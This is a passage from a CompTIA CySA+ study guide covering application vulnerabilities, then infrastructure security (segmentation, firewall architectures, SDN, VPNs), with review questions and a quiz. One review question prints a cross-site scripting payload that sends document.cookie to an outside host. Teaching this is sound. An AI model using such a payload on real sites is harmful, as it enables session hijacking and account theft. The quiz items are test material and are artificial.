resulting exception to bypass security logic or to cause
the application to reveal debugging information.
Insecure Object Reference
Applications frequently use the actual name or key of an
object when generating web pages. Applications don’t
always verify that a user is authorized for the target
object. This results in an insecure object reference
flaw. Such an attack on a vulnerability can come from an
authorized user, meaning that the user has permission to
use the application but is accessing information to which
she should not have access. To prevent this problem,
each direct object reference should undergo an access
check. Code review of the application with this specific
issue in mind is also recommended.
Race Condition
A race condition is a vulnerability that targets the
normal sequencing if functions. It is an attack in which
the hacker inserts himself between instructions,
introduces changes, and alters the order of execution of
the instructions, thereby altering the outcome. A type of
race condition is time-of-check/time-of-use
vulnerability. In this attack, a system is changed between
a condition check and the display of the check’s results.
For example, consider the following scenario: At 10:00
a.m. a hacker was able to obtain a valid authentication
token that allowed read/write access to the database. At
10:15 a.m. the security administrator received alerts from
the IDS about a database administrator performing
unusual transactions. At 10:25 a.m. the security
administrator reset the database administrator’s
password. At 11:30 a.m. the security administrator was
still receiving alerts from the IDS about unusual
transactions from the same user. In this case, the hacker
created a race condition that disturbed the normal
process of authentication. The hacker remained logged in
with the old password and was still able to change data.
Countermeasures to these attacks are to make critical
sets of instructions either execute in order and in entirety
or to roll back or prevent the changes. It is also best for
the system to lock access to certain items it will access
when carrying out these sets of instructions.
Broken Authentication
When the authentication system is broken, it’s as if
someone has left the front door open. This can lead to a
faster compromise of vulnerabilities discussed in this
section as well as attacks covered in the previous section.
Broken authentication means that a malicious individual
has either guessed or stolen a password, enabling them
to log in as the user with all of the user’s rights. Typical
methods are
• Guessing a password
• Cracking a captured password hash
• Phishing attacks
• Using social engineering such as shoulder surfing
Recall that Chapter 2, “Utilizing Threat Intelligence to
Support Organizational Security,” covered the CVSS
scoring system for vulnerabilities. As a review, the
system uses a metric dedicated to Privileges Required
(Pr) to describe the authentication an attacker would
need to get through to exploit the vulnerability. The
metric has three possible values:
• H: Stands for High and means the attacker
requires privileges that provide significant (that
is, administrative) control over the vulnerable
component, allowing access to component-wide
settings and files.
• L: Stands for Low and means the attacker requires
privileges that provide basic user capabilities that
could normally affect only settings and files
owned by a user.
• N: Stands for None and means that no
authentication mechanisms are in place to stop
the exploit of the vulnerability.
Sensitive Data Exposure
Sensitive data in this context includes usernames,
passwords, encryption keys, and paths that applications
need to function but that would cause harm if
discovered. Determining the proper method of securing
this information is critical and not easy. In the case of
passwords, a generally accepted rule is to not hard-code
passwords (although this was not always standard
practice). Instead, passwords should be protected using
encryption when they are included in application code.
This makes them difficult to change, reverse, or discover.
Storing this type of sensitive data in a configuration file
also presents problems. Such files are usually
discoverable, and even if they are hidden, they can be
discovered by using a demo version of the software if it is
a standard or default location. Whatever method you
use, give significant thought to protecting these sensitive
forms of data. The following measures can help you
prevent disclosure of sensitive information from storage:
• Ensure that memory locations where this data is
stored are locked memory.
• Ensure that ACLs attached to sensitive data are
properly configured.
• Implement an appropriate level of encryption.
Insecure Components
There are two types of components, physical and
software. The emphasis in this section is on software
components. An insecure software component is a set of
code that performs a particular function as a part of a
larger system, but does so in a way that creates
vulnerabilities.
The U.S. Department of Homeland Security has
estimated that 90% of software components are
downloaded from code repositories. These repositories
hold code that can be reused. Using these repositories
speeds software development because it eliminates the
time it would take to create these components from
scratch. Organizations might have their own repository
for in-house code that has been developed.
In other cases, developers may make use of a third-party
repository in which the components are sold.
Vulnerabilities exist in much of the code found in third
party repositories. Many have been documented and
disclosed as Common Vulnerabilities and Exposures
(CVEs). In many cases these vulnerabilities have been
addressed and updates have been uploaded to the
repository. The problem is that far too many
vulnerabilities have not been addressed, and even in
cases where they have, developers continue to use the
vulnerable components instead of downloading the new
versions.
Developers who do rely on third-party repositories must
also keep track of the components’ updates and security
profiles.
Code Reuse
Not all code reuse comes from a third party. In some
cases, organizations maintain an internal code
repository. The Financial Services Information Sharing
and Analysis Center (FS-ISAC), an industry forum for
collaboration on critical security threats facing the global
financial services sector, recommends the following
measures to reduce the risk of reusing components in
general:
• Developers must apply policy controls during the
acquisition process as the most proactive type of
control for addressing the security vulnerabilities
in open-source libraries.
• Manage risk by using controlled internal
repositories to provision open-source components
and block the ability to download components
directly from the Internet.
Insufficient Logging and Monitoring
If the authentication system is broken, then the front
door is open. If there is insufficient logging and
monitoring, you don’t even know that someone came
through the front door! One of the challenges of staying
on top of log review is the overwhelming feeling that
other “things” are more important. Even when time is
allotted in many cases, the sheer amount of data to
analyze is intimidating.
Audit reduction tools are preprocessors designed to
reduce the volume of audit records to facilitate manual
review. Before a security review, these tools can remove
many audit records known to have little security
significance. These tools generally remove records
generated by specified classes of events, such as records
generated by nightly backups. Some technicians make
use of scripts for this purpose. One such Perl script called
swatch (the “Simple WATCHer”) is used by many Linux
technicians.
For large enterprises, the amount of log data that needs
to be analyzed can be quite large. For this reason, many
organizations implement a security information and
event management (SIEM) system, which provides an
automated solution for analyzing events and deciding
where the attention needs to be given. In Chapter 11,
“Analyzing Data As Part of Security Monitoring
Activities,” you will learn more about SIEM.
Weak or Default Configurations
A default configuration is one where the settings from
the factory have not been changed. This can allow for
insecure settings because many vendors adopt security
settings that will provide functionality in the largest
number of scenarios. Functionality and security are two
completely different goals and are not always
compatible. Software settings should not be left to the
defaults and should be analyzed for the best
configuration for the scenario.
Misconfigurations are settings that depart from the
defaults but are still insecure. Some of the largest
breaches have occurred due to these “mistakes.” One of
the ways to gain some control over this process is to
implement a configuration management system.
Although it’s really a subset of change management,
configuration management specifically focuses itself on
bringing order out of the chaos that can occur when
multiple engineers and technicians have administrative
access to the computers and devices that make the
network function. The functions of configuration
management are as follows:
• Report the status of change processing.
• Document the functional and physical
characteristics of each configuration item.
• Perform information capture and version control.
• Control changes to the configuration items, and
issue versions of configuration items from the
software library.
Note
In the context of configuration management, a software library is a controlled
area accessible only to approved users who are restricted to the use of an
approved procedure. A configuration item (CI) is a uniquely identifiable subset
of the system that represents the smallest portion to be subject to an
independent configuration control procedure. When an operation is broken into
individual CIs, the process is called configuration identification.
Examples of these types of changes are as follows:
• Operating system configuration
• Software configuration
• Hardware configuration
The biggest contribution of configuration management
controls is ensuring that changes to the system do not
unintentionally diminish security. Because of this, all
changes must be documented, and all network diagrams,
both logical and physical, must be updated constantly
and consistently to accurately reflect the state of each
configuration now and not as it was two years ago.
Verifying that all configuration management policies are
being followed should be an ongoing process.
In many cases it is beneficial to form a configuration
control board. The tasks of the configuration control
board can include the following:
• Ensuring that changes made are approved, tested,
documented, and implemented correctly.
• Meeting periodically to discuss configuration
status accounting reports.
• Maintaining responsibility for ensuring that
changes made do not jeopardize the soundness of
the verification system.
In summary, the components of configuration
management are as follows:
• Configuration control
• Configuration status accounting
• Configuration audit
Use of Insecure Functions
Software developers use functions to make things
happen in software. Some functions are more secure
than others (although some programmers will tell you
they are all safe if used correctly). Developers should
research, identify, and avoid those functions that are
known to cause security issues.
strcpy
One function that has a reputation for issues is the
strcpy function in C++. It copies the C string pointed by
source into the array pointed by destination, including
the terminating null character (and stopping at that
point). The issue is that if the destination is not long
enough to contain the string, an overrun occurs.
To avoid overflows, the size of the array pointed by
destination shall be long enough to contain the same C
string as source (including the terminating null
character), and should not overlap in memory with
source.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 7-3 lists a reference of these key topics and the
page numbers on which each is found.
Table 7-3 Key Topics in Chapter 7
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
Extensible Markup Language (XML) attack
eXtensible Access Control Markup Language (XACML)
policy enforcement point (PEP)
policy decision point (PDP)
Structured Query Language (SQL) injection
overflow attacks
buffer overflow
integer overflow
Privilege Escalation
heap overflows
remote code execution
directory traversal
privilege escalation
password spraying
credential stuffing
man-in-the-middle attack
Dynamic ARP Inspection (DAI)
DHCP snooping
session hijacking
rootkit
cross-site scripting (XSS)
reflective XSS
persistent XSS
DOM XSS
dereference
insecure object reference
race condition
strcpy
REVIEW QUESTIONS
1. In XACML, the entity that is protecting the resource
that the subject (a user or an application) is
attempting to access is called the ____________.
2. Match the following terms with their definitions.
3. List at least one of the criteria used by XACML to
provide for fine-grained control of activities.
4. _________________________ occurs when
math operations try to create a numeric value that
is too large or the available space.
5. Match the following terms with their definitions.
6. List at least one way that sessions can be
highjacked.
7. What is the following script designed to do?
<SCRIPT>
document.location='http://site.comptia/cgibin/script.cgi?'+document. cookie </SCRIPT>
8. Match the following terms with their definitions.
9. List at least one of the functions of configuration
management.
10. ____________________ is a function that has
a reputation for issues in C++.
Chapter 8. Security
Solutions for
Infrastructure
Management
This chapter covers the following topics related
to Objective 2.1 (Given a scenario, apply security
solutions for infrastructure management) of the
CompTIA Cybersecurity Analyst (CySA+) CS0002 certification exam:
• Cloud vs. on-premises: Discusses the two main
infrastructure models: cloud vs. on-premises
• Asset management: Covers issues surrounding
asset management including asset tagging
• Segmentation: Describes physical and virtual
segmentation, jumpboxes, and system isolation
with an air gap
• Network architecture: Covers physical,
software-defined, virtual private cloud (VPC),
virtual private network (VPN), and serverless
architectures
• Change management: Discusses the formal
change management processes
• Virtualization: Focuses on virtual desktop
infrastructure (VDI)
• Containerization: Discusses an alternate form
of virtualization
• Identity and access management: Explores
privilege management, multifactor authentication
(MFA), single sign-on (SSO), federation, rolebased access control, attribute-based access
control, mandatory access control, and manual
review
• Cloud access security broker (CASB):
Discusses the role of CASBs
• Honeypot: Covers placement and use of
honeypots
• Monitoring and logging: Explains monitoring
and logging processes
• Encryption: Introduces important types of
encryption
• Certificate management: Discusses issues
critical to managing certificates
• Active defense: Discusses defensive strategy in
the cybersecurity arena
Over the years, security solutions have been adopted,
discredited, and replaced as technology changes.
Cybersecurity professionals must know and understand
the pros and cons of various approaches to protect the
infrastructure. This chapter examines both old and new
solutions.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these 14 self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 8-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 8-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which statement is false with respect to
multitenancy in a cloud?
a. It can lead to allowing another tenant or
attacker to see others’ data or to assume the
identity of other clients.
b. It prevents residual data of former tenants
from being exposed in storage space assigned to
new tenants.
c. Users may lose access due to inadequate
redundancy and fault-tolerance measures.
d. Shared ownership of data with the customer
can limit the legal liability of the provider.
2. Which of the following involves marking a video,
photo, or other digital media with a GPS location?
a. TAXII
b. Geotagging
c. Geofencing
d. RFID
3. Which of the following is a network logically
separate from the other networks where resources
that will be accessed from the outside world are
made available to only those that are
authenticated?
a. Intranet
b. DMZ
c. Extranet
d. Internet
4. Which of the following terms refers to any device
exposed directly to the Internet or to any untrusted
network?
a. Screened subnet
b. Three-legged firewall
c. Bastion host
d. Screened host
5. Which statement is false regarding the change
management process?
a. All changes should be formally requested.
b. Each request should be approved as quickly as
possible.
c. Prior to formal approval, all costs and effects of
the methods of implementation should be
reviewed.
d. After they’re approved, the change steps should
be developed.
6. Which of the following is installed on hardware and
is considered as “bare metal”?
a. Type 1 hypervisor
b. VMware Workstation
c. Type 2 hypervisor
d. Oracle VirtualBox
7. Which of the following is a technique in which the
kernel allows for multiple isolated user space
instances?
a. Containerization
b. Segmentation
c. Affinity
d. Secure boot
8. Which of the following authentication factors
represents something a person is?
a. Knowledge factor
b. Ownership factor
c. Characteristic factor
d. Location factor
9. Which of the following is a software layer that
operates as a gatekeeper between an organization’s
on-premises network and the provider’s cloud
environment?
a. Virtual router
b. CASB
c. Honeypot
d. Black hole
10. Which of the following is the key purpose of a
honeypot?
a. Loss minimization
b. Information gathering
c. Confusion
d. Retaliation
11. Which of the following relates to logon and
information security continuous monitoring?
a. IEEE 802.ac
b. IOC/IEC 27017
c. NIST SP 800-137
d. FIPS
12. Which of the following cryptographic techniques
provides the best method of ensuring integrity and
determines if data has been altered?
a. Encryption
b. Hashing
c. Digital signature
d. Certificate pinning
13. Which of the following PKI components verifies the
requestor’s identity and registers the requestor?
a. TA
b. CA
c. RA
d. BA
14. Which of the following is a new approach to security
that is offensive in nature rather than defensive?
a. Hunt teaming
b. White teaming
c. Blue teaming
d. APT
FOUNDATION TOPICS
CLOUD VS. ON-PREMISES
Accompanying the movement to virtualization is a
movement toward the placement of resources in a cloud
environment. While the cloud allows users to access the
resources from anywhere they can get Internet access, it
presents a security landscape that differs from the
security landscape of your on-premises resources. For
one thing, a public cloud solution relies on the security
practices of the provider.
These are the biggest risks you face when placing
resources in a public cloud:
• Multitenancy can lead to the following:
• Allowing another tenant or attacker to see
others’ data or to assume the identity of other
clients
• Residual data of former tenants exposed in
storage space assigned to new tenants
• The use of virtualization in cloud environments
leads to the same issues covered later in this
chapter in the section “Virtualization.”
• Mechanisms for authentication and authorization
may be improper or inadequate.
• Users may lose access due to inadequate
redundancy and fault-tolerance measures.
• Shared ownership of data with the customer can
limit the legal liability of the provider.
• The provider may use data improperly (such as
data mining).
• Data jurisdiction is an issue: Where does the data
actually reside, and what laws affect it, based on
its location?
Cloud Mitigations
Over time, best practices have emerged to address both
cloud and on-premises environments. With regard to
cloud it is incumbent on the customer to take an active
role in ensuring security, including
• Understand you share responsibility for security
with the vendor
• Ask, don’t assume, with regard to detailed security
questions
• Deploy an identity and access management
solution that supports cloud
• Train your staff
• Establish and enforce cloud security policies
• Consider a third-party partner if you don’t have
the skill sets to protect yourself
ASSET MANAGEMENT
Asset management and inventory control across the
technology life cycle are critical to ensuring that assets
are not stolen or lost and that data on assets is not
compromised in any way. Asset management and
inventory control are two related areas. Asset
management involves tracking the devices that an
organization owns, and inventory control involves
tracking and containing inventory. All organizations
should implement asset management, but not all
organizations need to implement inventory control.
Asset Tagging
Asset tagging is the process of placing physical
identification numbers of some sort on all assets. This
can be a simple as a small label that identifies the asset
and the owner, as shown in Figure 8-1.
Figure 8-1 Asset Tag
Asset tagging can also be a part of more robust assettracking system when implemented in such a way that
the device can be tracked and located at any point in
time. Let’s delve into the details of such systems.
Device-Tracking Technologies
Device-tracking technologies allow organizations to
determine the location of a device and also often allow
the organization to retrieve the device. However, if the
device cannot be retrieved, it may be necessary to wipe
the device to ensure that the data on the device cannot be
accessed by unauthorized users. As a security
practitioner, you should stress to your organization the
need to implement device-tracking technologies and
remote-wiping capabilities.
Geolocation/GPS Location
Device-tracking technologies include geolocation, or
Global Positioning System (GPS) location. With this
technology, location and time information about an asset
can be tracked, provided that the appropriate feature is
enabled on the device. For most mobile devices, the
geolocation or GPS location feature can be enhanced
through the use of Wi-Fi networks. A security
practitioner must ensure that the organization enacts
mobile device security policies that include the
mandatory use of GPS location features. In addition, it
will be necessary to set up appropriate accounts that
allow personnel to use the vendor’s online service for
device location. Finally, remote-locking and remotewiping features should be seriously considered,
particularly if the mobile devices contain confidential or
private information.
Object-Tracking and ObjectContainment Technologies
Object-tracking and object-containment technologies are
primarily concerned with ensuring that inventory
remains within a predefined location or area. Objecttracking technologies allow organizations to determine
the location of inventory. Object-containment
technologies alert personnel within the organization if
inventory has left the perimeter of the predefined
location or area.
For most organizations, object-tracking and objectcontainment technologies are used only for inventory
assets above a certain value. For example, most retail
stores implement object-containment technologies for
high-priced electronics devices and jewelry. However,
some organizations implement these technologies for all
inventory, particularly in large warehouse environments.
Technologies used in this area include
geotagging/geofencing and RFID.
Geotagging/Geofencing
Geotagging involves marking a video, photo, or other
digital media with a GPS location. This feature has
received criticism recently because attackers can use it to
pinpoint personal information, such as the location of a
person’s home. However, for organizations, geotagging
can be used to create location-based news and media
feeds. In the retail industry, geotagging can be helpful for
allowing customers to locate a store where a specific
piece of merchandise is available.
Geofencing uses the GPS to define geographical
boundaries. A geofence is a virtual barrier, and alerts can
occur when inventory enters or exits the boundary.
Geofencing is used in retail management, transportation
management, human resources management, law
enforcement, and other areas.
RFID
Radio frequency identification (RFID) uses radio
frequency chips and readers to manage inventory. The
chips are placed on individual pieces or pallets of
inventory. RFID readers are placed throughout the
location to communicate with the chips. Identification
and location information are collected as part of the
RFID communication. Organizations can customize the
information that is stored on an RFID chip to suit their
needs.
Two types of RFID systems can be deployed: active
reader/passive tag (ARPT) and active reader/active tag
(ARAT). In an ARPT system, the active reader transmits
signals and receives replies from passive tags. In an
ARAT system, active tags are woken with signals from
the active reader.
RFID chips can be read only if they are within a certain
proximity of the RFID reader. A recent implementation
of RFID chips is the Walt Disney MagicBand, which is
issued to visitors at Disney resorts and theme parks. The
band verifies park admission and allows visitors to
reserve attraction restaurant times and pay for purchases
in the resort.
Different RFID systems are available for different
wireless frequencies. If your organization decides to
implement RFID, it is important that you fully research
the advantages and disadvantages of different
frequencies.
SEGMENTATION
One of the best ways to protect sensitive resources is to
utilize network segmentation. When you segment a
network, you create security zones that are separated
from one another by devices such as firewalls and routers
that can be used to control the flow of traffic between the
zones.
Physical
Physical segmentation is a tried and true method of
segmentation. While there is no limit to the number of
zones you can create in general, most networks have the
zone types discussed in the following sections.
LAN
Let’s talk about what makes a local-area network (LAN)
local. Although classically we think of a LAN as a
network located in one location, such as a single office,
referring to a LAN as a group of systems that are
connected with a fast connection is more correct. For
purposes of this discussion, that is any connection over
10 Mbps. This might not seem very fast to you, but it is
fast compared to a wide-area network (WAN). Even a T1
connection is only 1.544 Mbps. Using this as our
yardstick, if a single campus network has a WAN
connection between two buildings, then the two
networks are considered two LANs rather than a single
LAN. In most cases, however, networks in a single
campus are typically not connected with a WAN
connection, which is why usually you hear a LAN defined
as a network in a single location.
Intranet
Within the boundaries of a single LAN, there can be
subdivisions for security purposes. The LAN might be
divided into an intranet and an extranet. The intranet is
the internal network of the enterprise. It is considered a
trusted network and typically houses any sensitive
information and systems and should receive maximum
protection with firewalls and strong authentication
mechanisms.
Extranet
An extranet is a network logically separate from the
intranet where resources that will be accessed from the
outside world are made available to authorized,
authenticated third parties. Access might be granted to
customers, or business partners. All traffic between the
extranet and the intranet should be closely monitored
and securely controlled. Nothing of a sensitive nature
should be placed in the extranet.
DMZ
Like an extranet, a demilitarized zone (DMZ) is a
network logically separate from the intranet where
resources that will be accessed from the outside world
are made available. The difference is that usually an
extranet contains resources available only to certain
entities from the outside world, and access is secured
with authentication, whereas a DMZ usually contains
resources available to everyone from the outside world,
without authentication. A DMZ might contain web
servers, email servers, or DNS servers. Figure 8-2 shows
the relationship between intranet, extranet, Internet, and
DMZ networks.
Figure 8-2 Network Segmentation
Virtual
While all the network segmentation components
discussed thus far separate networks physically with
devices such as routers and firewalls, a virtual localarea network (VLAN) separates them logically.
Enterprise-level switches are capable of creating VLANs.
These are logical subdivisions of a switch that segregates
ports from one another as if they were in different LANs.
VLANs can also span multiple switches, meaning that
devices connected to switches in different parts of a
network can be placed in the same VLAN, regardless of
physical location.
A VLAN adds a layer of separation between sensitive
devices and the rest of the network. For example, if only
two devices should be able to connect to the HR server,
the two devices and the HR server could be placed in a
VLAN separate from the other VLANs. Traffic between
VLANs can only occur through a router. Routers can be
used to implement access control lists (ACLs) that
control the traffic allowed between VLANs. Figure 8-3
shows an example of a network with VLANs.
Figure 8-3 VLANs
VLANs can be used to address threats that exist within a
network, such as the following:
• DoS attacks: When you place devices with
sensitive information in a separate VLAN, they are
shielded from both Layer 2 and Layer 3 DoS
attacks from devices that are not in that VLAN.
Because many of these attacks use network
broadcasts, if they are in a separate VLAN, they
will not receive broadcasts unless they originate
from the same VLAN.
• Unauthorized access: While permissions
should be used to secure resources on sensitive
devices, placing those devices in a secure VLAN
allows you to deploy ACLs on the router to allow
only authorized users to connect to the device.
Jumpbox
A jumpbox, or jump server, is a server that is used to
access devices that have been placed in a secure network
zone such as a DMZ. The server would span the two
networks to provide access from an administrative
desktop to the managed device. Secure Shell (SSH)
tunneling is common as the de facto method of access.
Administrators can use multiple zone-specific jumpboxes
to access what they need, and lateral access between
servers is prevented by whitelists. This helps prevent the
types of breaches suffered by both Target and Home
Depot, in which lateral access was used to move from
one compromised device to other servers. Figure 8-4
shows a jumpbox (jump server) arrangement.
Figure 8-4 Jumpboxes
A jumpbox arrangement can avoid the following issues:
• Breaches that occur from lateral access
• Inappropriate administrative access of sensitive
servers
System Isolation
While the safest device is one that is not connected to
any networks, disconnecting devices is typically not a
workable solution if you need to access the data on a
system. However, there are some middle-ground
solutions between total isolation and total access.
Systems can be isolated from other systems through the
control of communications with the device. An example
of system isolation is through the use of Microsoft
Server isolation. By leveraging Group Policy (GP)
settings, you can require that all communication with
isolated servers must be authenticated and protected
(and optionally encrypted as well) by using IPsec. As
Group Policy settings can only be applied to computers
that are domain members, computers that are not
domain members must be specified as exceptions to the
rules controlling access to the device if they need access.
Figure 8-5 shows the results of three different types of
devices attempting to access an isolated server. The nondomain device (unmanaged) cannot connect, while the
unmanaged device that has been excepted can, and the
domain member that lies within the isolated domain can
also.
Figure 8-5 Server Isolation
The device that is a domain member (Computer 1) with
the proper Group Policy settings to establish an
authenticated session is allowed access. The computer
that is not a domain member but has been excepted is
allowed an unauthenticated session. Finally, a device
missing the proper GP settings to establish an
authenticated session is not allowed access. This is just
one example of how devices can be isolated.
Air Gap
In cases where data security concerns are extreme, it
may even be advisable to protect the underlying system
with an air gap. This means the device has no network
connections and all access to the system must be done
manually by adding and removing items such as updates
and patches with a flash drive or other external device.
Any updates to the data on the device must be done
manually, using external media. An example of when it
might be appropriate to do so is in the case of a
certificate authority (CA) root server. If a root CA is in
some way compromised (broken into, hacked, stolen, or
accessed by an unauthorized or malicious person), all the
certificates that were issued by that CA are also
compromised.
NETWORK ARCHITECTURE
Network architecture refers not only to the components
that are arranged and connected to one another (physical
architecture) but also to the communication paths the
network uses (logical architecture). This section surveys
security considerations for a number of different
architectures that can be implemented both physically
and virtually.
Physical
The physical network comprises the physical devices and
their connections to one another. The physical network
in many cases serves as an underlay or carrier for higherlevel network processes and protocols.
Security practitioners must understand two main types
of enterprise deployment diagrams:
• Logical deployment diagram: Shows the
architecture, including the domain architecture,
with the existing domain hierarchy, names, and
addressing scheme; server roles; and trust
relationships.
• Physical deployment diagram: Shows the
details of physical communication links, such as
cable length, grade, and wiring paths; servers,
with computer name, IP address (if static), server
role, and domain membership; device location,
such as printer, hub, switch, modem, router, or
bridge, as well as proxy location; communication
links and the available bandwidth between sites;
and the number of users, including mobile users,
at each site.
A logical diagram usually contains less information than
a physical diagram. While you can often create a logical
diagram from a physical diagram, it is nearly impossible
to create a physical diagram from a logical one.
Figure 8-6 shows an example of a logical network
diagram.
Figure 8-6 Logical Network Diagram
As you can see, the logical network diagram shows only a
few of the servers in the network, the services they
provide, their IP addresses, and their DNS names. The
relationships between the different servers are shown by
the arrows between them. Figure 8-7 shows an example
of a physical network diagram.
Figure 8-7 Physical Network Diagram
A physical network diagram gives much more
information than a logical one, including the cabling
used, the devices on the network, the pertinent
information for each server, and other connection
information.
Note
CySA+ firewall-related objectives including firewall logs, web application
firewalls (WAFs), and implementing configuration changes to firewalls are
covered later in the book in Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities.”
Firewall Architecture
Whereas the type of firewall speaks to the internal
operation of the firewall, the architecture refers to the
way in which firewalls are deployed in the network to
form a system of protection. The following sections look
at the various ways firewalls can be deployed.
Bastion Hosts
A bastion host may or may not be a firewall. The term
actually refers to the position of any device. If the device
is exposed directly to the Internet or to any untrusted
network while screening the rest of the network from
exposure, it is a bastion host. Some other examples of
bastion hosts are FTP servers, DNS servers, web servers,
and email servers. In any case where a host must be
publicly accessible from the Internet, the device must be
treated as a bastion host, and you should take the
following measures to protect these machines:
• Disable or remove all unnecessary services,
protocols, programs, and network ports.
• Use authentication services separate from those of
the trusted hosts within the network.
• Remove as many utilities and system
configuration tools as is practical.
• Install all appropriate service packs, hotfixes, and
patches.
• Encrypt any local user account and password
databases.
A bastion host can be located in the following locations:
• Behind the exterior and interior firewalls:
Locating it here and keeping it separate from the
interior network complicates the configuration
but is safest.
• Behind the exterior firewall only: Perhaps
the most common location for a bastion host is
separated from the internal network; this is a less
complicated configuration. Figure 8-8 shows an
example in which there are two bastion hosts: the
FTP/WWW server and the SMTP/DNS server.
• As both the exterior firewall and a bastion
host: This setup exposes the host to the most
danger.
Figure 8-8 Bastion Host in a Screened Subnet
Dual-Homed Firewalls
A dual-homed firewall has two network interfaces:
one pointing to the internal network and another
connected to the untrusted network. In many cases,
routing between these interfaces is turned off. The
firewall software allows or denies traffic between the two
interfaces based on the firewall rules configured by the
administrator. The following are some of the advantages
of this setup:
• The configuration is simple.
• It is possible to perform IP masquerading (NAT).
• It is less costly than using two firewalls.
Disadvantages include the following:
• There is a single point of failure.
• It is not as secure as other options.
Figure 8-9 shows a dual-homed firewall (also called a
dual-homed host) location.
Figure 8-9 Location of Dual-Homed Firewall
Multihomed Firewall
A firewall can be multihomed. One popular type of
multihomed firewall is the three-legged firewall. In
this configuration, there are three interfaces: one
connected to the untrusted network, one connected to
the internal network, and one connected to a DMZ. As
mentioned earlier in this chapter, a DMZ is a protected
network that contains systems needing a higher level of
protection. The advantages of a three-legged firewall
include the following:
• It offers cost savings on devices because you need
only one firewall and not two or three.
• It is possible to perform IP masquerading (NAT)
on the internal network while not doing so for the
DMZ.
Among the disadvantages are the following:
• The complexity of the configuration is increased.
• There is a single point of failure.
The location of a three-legged firewall is shown in Figure
8-10.
Figure 8-10 Location of a Three-legged Firewall
Screened Host Firewalls
A screened host firewall is located between the final
router and the internal network. The advantages to a
screened host firewall solution include the following:
• It offers more flexibility than a dual-homed
firewall because rules rather than an interface
create the separation.
• Potential cost savings.
The disadvantages include the following:
• The configuration is more complex.
• It is easier to violate the policies than with dualhomed firewalls.
Figure 8-11 shows the location of a screened host
firewall.
Figure 8-11 Location of a Screened Host Firewall
Screened Subnets
In a screened subnet, two firewalls are used, and
traffic must be inspected at both firewalls before it can
enter the internal network. The advantages of a screened
subnet include the following:
• It offers the added security of two firewalls before
the internal network.
• One firewall is placed before the DMZ, protecting
the devices in the DMZ.
Disadvantages include the following:
• It is more costly than using either a dual-homed or
three-legged firewall.
• Configuring two firewalls adds complexity.
Figure 8-12 shows the placement of the firewalls to
create a screened subnet. The router is acting as the
outside firewall, and the firewall appliance is the second
firewall. In any situation where multiple firewalls are in
use, such as an active/passive cluster of two firewalls,
care should be taken to ensure that TCP sessions are not
traversing one firewall while return traffic of the same
session is traversing the other. When stateful filtering is
being performed, the return traffic will be denied, which
will break the user connection. In the real world, various
firewall approaches are mixed and matched to meet
requirements, and you may find elements of all these
architectural concepts being applied to a specific
situation.
Figure 8-12 Location of a Screened Subnet
Software-Defined Networking
In a network, three planes typically form the networking
architecture:
• Control plane: This plane carries signaling
traffic originating from or destined for a router.
This is the information that allows routers to
share information and build routing tables.
• Data plane: Also known as the forwarding plane,
this plane carries user traffic.
• Management plane: This plane administers
the router.
Software-defined networking (SDN) has been
classically defined as the decoupling of the control plane
and the data plane in networking. In a conventional
network, these planes are implemented in the firmware
of routers and switches. SDN implements the control
plane in software, which enables programmatic access to
it.
This definition has evolved over time to focus more on
providing programmatic interfaces to networking
equipment and less on the decoupling of the control and
data planes. An example of this is the provision of
application programming interfaces (APIs) by vendors
into the multiple platforms they sell.
One advantage of SDN is that it enables very detailed
access into, and control over, network elements. It allows
IT organizations to replace a manual interface with a
programmatic one that can enable the automation of
configuration and policy management.
An example of the use of SDN is using software to
centralize the control plane of multiple switches that
normally operate independently. (While the control
plane normally functions in hardware, with SDN it is
performed in software.) Figure 8-13 illustrates this
concept.
Figure 8-13 Centralized and Decentralized SDN
The advantages of SDN include the following:
• Mixing and matching solutions from different
vendors is simple.
• SDN offers choice, speed, and agility in
deployment.
The following are disadvantages of SDN:
• Loss of connectivity to the controller brings down
the entire network.
• SDN can potentially allow attacks on the
controller.
Virtual SAN
A virtual storage area network (VSAN) is a
software-defined storage method that allows pooling of
storage capabilities and instant and automatic
provisioning of virtual machine storage. This is a method
of software-defined storage (SDS). It usually includes
dynamic tiering, QoS, caching, replication, and cloning.
Data availability is ensured through the software, not by
implementing redundant hardware. Administrators are
able to define policies that allow the software to
determine the best placement of data. By including
intelligent data placement, software-based controllers,
and software RAID, a VSAN can provide better data
protection and availability than tradition hardware-only
options.
Virtual Private Cloud (VPC)
In Chapter 6, “Threats and Vulnerabilities Associated
with Operating in the Cloud,” you learned about cloud
deployment models, one of which was the hybrid model.
A type of hybrid model is the virtual private cloud
(VPC) model. In this model, a public cloud provider
isolates a specific portion of its public cloud
infrastructure to be provisioned for private use. How
does this differ from a standard private cloud? VPCs are
private clouds sourced over a third-party vendor
infrastructure rather than over an enterprise IT
infrastructure. Figure 8-14 illustrates this architecture.
Figure 8-14 Virtual Private Cloud
Virtual Private Network (VPN)
A virtual private network (VPN) allows external
devices to access an internal network by creating a
tunnel over the Internet. Traffic that passes through the
VPN tunnel is encrypted and protected. An example of a
network with a VPN is shown in Figure 8-15. In a VPN
deployment, only computers that have the VPN client
and are able to authenticate will be able to connect to the
internal resources through the VPN concentrator.
Figure 8-15 VPN
VPN connections use an untrusted carrier network but
provide protection of the information through strong
authentication protocols and encryption mechanisms.
While we typically use the most untrusted network, the
Internet, as the classic example, and most VPNs do travel
through the Internet, a VPN can be used with interior
networks as well whenever traffic needs to be protected
from prying eyes.
In VPN operations, entire protocols wrap around other
protocols when this process occurs. They include
• A LAN protocol (required)
• A remote access or line protocol (required)
• An authentication protocol (optional)
• An encryption protocol (optional)
A device that terminates multiple VPN connections is
called a VPN concentrator. VPN concentrators
incorporate the most advanced encryption and
authentication techniques available.
